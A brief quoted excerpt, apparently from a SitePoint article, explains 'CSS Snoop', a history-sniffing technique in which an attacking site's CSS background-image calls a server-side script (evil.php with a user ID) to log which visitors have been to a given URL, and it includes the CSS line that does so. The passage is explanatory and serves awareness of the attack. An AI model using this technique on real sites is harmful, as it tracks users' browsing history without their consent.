CSS Snoop (from SitePoint):

Now, instead of giving the URL of a benign image file, the attacking site can supply a URL to a server-side script, passing along a unique ID to identify you:

#examplelink {   background-image: 


url(evil.php?user=123); }

That script can then collect and store a list of all users who, in this case, have visited http://www.example.com/.